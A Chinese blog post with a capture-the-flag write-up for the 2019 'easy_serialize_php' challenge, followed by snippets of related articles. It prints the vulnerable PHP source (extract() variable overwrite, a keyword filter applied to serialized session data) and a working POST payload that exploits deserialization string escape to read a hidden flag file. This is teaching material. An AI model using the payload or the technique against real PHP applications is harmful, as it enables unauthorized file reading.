[安洵杯 2019]easy_serialize_php--序列化绕过,extract()函数。

最新推荐文章于 2023-11-16 09:46:04 发布
最新推荐文章于 2023-11-16 09:46:04 发布
阅读量337 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cainiao17441898/article/details/117624396
版权

解题:
打开源码:

 <?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

这里进行代码审计之后发现
extract会覆盖变量。file_get_content函数会获得文件内容。implode:用一个字符串去连接每个数组元素。
根据提示打开phpinfo
在这里插入图片描述这里就想到最后是要打开这个d0g3_f1ag.php。
逻辑:
base64_decode($userinfo[‘img’])=d0g3_f1ag.php。
$userinfo[‘img’]=ZDBnM19mMWFnLnBocA==;

 $userinfo = unserialize($serialize_info);

$serialize_info = filter(serialize($_SESSION));

这里会序列化session值。

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}

数组中有的数值会被换成空。
得让session[img]=ZDBnM19mMWFnLnBocA==;
这里就要利用序列化的:

>  <?php
   > #正规序列化的字符串 
   > $a = "a:2:{s:3:\"one\";s:4:\"flag\";s:3:\"two\";s:4:\"test\";}";
   > var_dump(unserialize($a));
   > #带有多余的字符的字符串 
   > $a_laji = "a:2:{s:3:\"one\";s:4:\"flag\";s:3:\"two\";s:4:\"test\";};s:3:\"真的垃圾img\";lajilaji";
   > var_dump(unserialize($a_laji));

这里用POST传入:

_SESSION[phpflag]=;s:4:"hack";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

按照题目顺序传入的参数被序列化后变成。(phpflag被换成空)

a:2:{s:7:"";s:51:";s:4:"hack";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

《";s:51:》这个变成传入的键名,对应的值是长度为4的hack。因为a=2所以只有两个键值对,那么后面这个《";s:3:“img”;s:20:“Z3Vlc3RfaW1nLnBuZw==”;}》就被抛弃了。这样就实现把用我们想要的img去替换题目中的img了。
传入之后发现有个新的文件名,把它base64加密替换原来文件的位置就行了,这里要注意加密之后长度是否还是20;就能得到flag了。
在这里插入图片描述

熊是本熊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
21-3 PHP序列化漏洞-魔术方法绕过
weixin_43263566的博客
01-17 543
启动靶场 -> 在浏览器打开链接(这个靶场平台比较良心不用花钱,有些平台按分钟收钱,时间一到靶场不续费就自动关闭)先进行进行收集,根据页面提示网站备份,我们可以通过目录探测方式找到备份文件,并根据文件进行审计等后续操作,以达到读取flag文件的目的。在PHP中,__wakeup()是一个魔术方法,用于在反序列化对象时自动调用。来进行绕过,通过添加位置来改变类名的个数。或 搜索: “[极客大挑战 2019]PHP”:指定排除的HTTP状态码,以逗号分隔。
PHP密码问题陈婷代码_C99.PHP webshell 绕过登陆密码漏洞(extract函数导致变量覆盖漏洞)...
weixin_39801879的博客
12-20 443
C99.php存在一个漏洞可以绕过登陆密码直接登陆的漏洞。http://127.0.0.1/c99.php?c99shcook[login]=0可直接登陆。漏洞原因是,错误的使用了extract()导致变量覆盖漏洞,即下面代码:@extract($_REQUEST["c99shcook"]);正好在验证登陆语句的前面,而验证登陆的代码为:if ($login) {if (empty($md5_pa...
web buuctf [安洵 2019]easy_serialize_php
weixin_44214568的博客
04-02 446
考点:反序列化逃逸 这个题目是一道php代码审计题目,打开就是源码, <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return pr
WEB攻防-PHP序列化&原生类TIPS&CVE绕过漏洞&属性类型特征
最新发布
siu~
11-16 670
1、PHP-反序列化-属性类型&显示特征 2、PHP-反序列化-CVE绕过&字符串逃逸 3、PHP-反序列化-原生类生成&利用&配合
渗透测试之pikachu PHP序列化(未完成)
LKmnbZ's Blog
11-14 475
1. 概述 序列化与反序列化 序列化函数serialize() 序列化说通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象: class S{ public $test="pikachu"; } $s=new S(); //创建一个对象 serialize($s); //把这个对象进行序列化 序列化后得到的结果是这个样子...
ts_serialize:零依赖库,用于序列化数据
05-19
:bowl_with_spoon: ts_serialize 零依赖库,用于序列化数据。 ts_serialize可以帮助您: 将camelCase类成员转换为snake_case JSON属性以与REST API一起使用从REST API有效负载中排除内部字段将数据类型转换为内部...
se_mouz_image.rar_serialize_序列化
09-23
在这个“se_mouz_image.rar_serialize_序列化”的主题中,我们将深入探讨如何利用`serialize()`函数序列化文档以及实现鼠标画图功能。 首先,我们来详细解释一下`serialize()`函数。`serialize()`是PHP内建的一个...
cpp-swooleserialize是目前php7中最快的序列化函数
08-15
在使用`swoole_serialize`时,开发者可以调用`Swoole\Serialize::pack()`函数序列化数据,以及`Swoole\Serialize::unpack()`函数进行反序列化。这两个函数都提供了简单易用的接口,使得在实际项目中集成和替换原有...
php序列化函数serialize() 和 unserialize() 与原生函数对比
12-19
`serialize()` 和 `unserialize()` 是PHP内建的序列化和反序列化函数。`serialize()` 可以将数组、对象以及其他类型的数据转化为字符串,而 `unserialize()` 则可以将这个字符串还原为原来的变量。例如: ```php $...
php_igbinary-2.0.8-1.0-nts-vc14-x86.zip
11-23
igbinary是一个优化的序列化库,它替代了PHP默认的序列化机制(serialize/unserialize)。传统PHP序列化会将数据转换为文本格式,这在内存和网络传输上都相对较慢。igbinary则将数据编码为二进制形式,大大减少了...
PHP弱类型及绕过方式(一)
qidiandexiaowu
05-03 1931
前言:学长带着我们学习了一些PHP弱类型,现在总结记一下。 目录: 0×01.extract函数变量覆盖 0×02.strcmp函数数组漏洞 0×03.urldecode二次密码绕过 0×04.md5函数加密 0×05.数组返回NULL绕过 0×06.弱类型整数大小比较绕过 0×07.sha()函数比较绕过 ...
[安洵 2019]easy_serialize_php序列化对象逃逸
sGanYu
11-02 3784
知识点: get与post传参 反序列化漏洞 反序列化中对象逃逸 file_get_contents函数 单击sourc_code跳出源码: <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; ret
BUUCTF刷题记录(4)
bmth666的博客
04-12 1349
文章目录web[ACTF2020 新生赛]Upload web [ACTF2020 新生赛]Upload 和之前极客大挑战一样的题,上传后缀为phtml即可 连上蚁剑,即可得到flag
easy_serialize_php
beihai2013
01-19 458
easy_serialize_php 考察:php代码审计,php序列化 打开页面,打开view-source,可以看到源代码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace(
[安洵 2019]easy_serialize_php
Yang_99的博客
08-08 516
1.考点 锻炼代码审计能力和学习 PHP序列化序列化中的对象逃逸 分析题目源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img);
审计练习13——[安洵 2019]easy_serialize_php
qq_43756333的博客
06-05 412
平台: buuoj.cn 打开靶机得源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ un
php中的截断绕过姿势
xiaopan233的博客
02-11 4923
1、%00截断 这个只有php &lt;= 5.3的才有。高的就不行了。所以就先不试了。(懒得下php5.3了= =)大概就是如下例: test.php%00.jpg 这是程序就会去掉%00后面的字符串。所以程序读取时候就变成了 test.php 2、0x00截断 原理是,程序读取文件名时。遇到0x00。就认为文件名结束了。因为0x00就是字符0.也就相当于false和空。类似于c语言...
php函数的常见漏洞
sun的博客
09-30 1797
php中得strcmp()函数的漏洞: strcmp(a1,a2)函数用来比较两个字符串是否相等的,比较的是对应字符的ascii码,如果相等返回0,当a1的ascii大于a2的返回小于0,a1的ascii码小于a2的,返回大于0. 但是这个函数是存在漏洞的,我们知道这个函数是用来比较字符串的,但是当我们传入为数组是,那变成字符串和数组进行比较了,因此php在5.2之前,默认返回的-1,5.2版...
bugku ctf 各种绕过 (各种绕过哟)
qq_42777804的博客
08-17 6422
打开打开       阅读代码 发现 只要使uname的sha1的值与passwd的sha1的值相等即可,但是同时他们两个的值又不能相等 构造 http://120.24.86.145:8002/web7/?uname[]=1&amp;id=margin   并发送  passwd[]=2 的 postdata 请求即可   依旧利用简单 有特别 好安装的  火狐 插件 ...
[安洵 2019]easy_serialize_php 1
03-16
这是一道 PHP 序列化题目,需要我们对 PHP序列化机制有一定的了解。 题目给出了一个序列化后的字符串,我们需要将其反序列化PHP 对象,并修改其中的某个属性值,最后再将其序列化回字符串。 具体的操作步骤...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

熊是本熊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值